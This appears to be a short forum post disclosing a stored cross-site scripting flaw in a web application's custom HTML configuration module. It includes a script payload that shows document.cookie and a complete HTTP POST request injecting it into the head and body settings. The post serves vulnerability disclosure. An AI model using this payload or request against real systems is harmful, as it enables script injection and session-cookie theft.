I found an xss vulnerability in the configuration/custom_html module.
In the functionality of adding custom HTML code at the CFG[CUSTOM_HTML_HEAD] and CFG[CUSTOM_HTML_BODY] parameters.
Payload: <script>alert('text'%2bdocument.cookie)</script>
Request:
Code: Select all
POST /index.php?module=configuration/save&redirect_to=configuration/custom_html HTTP/1.1
Host: 192.168.0.15
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Content-Type: application/x-www-form-urlencoded
Cookie: [Cookie]
form_session_token=DGIbpSzqgS&CFG[CUSTOM_HTML_HEAD]=<script>alert('head'%2bdocument.cookie)</script>&CFG[CUSTOM_HTML_BODY]=<script>alert('body'%2bdocument.cookie)</script>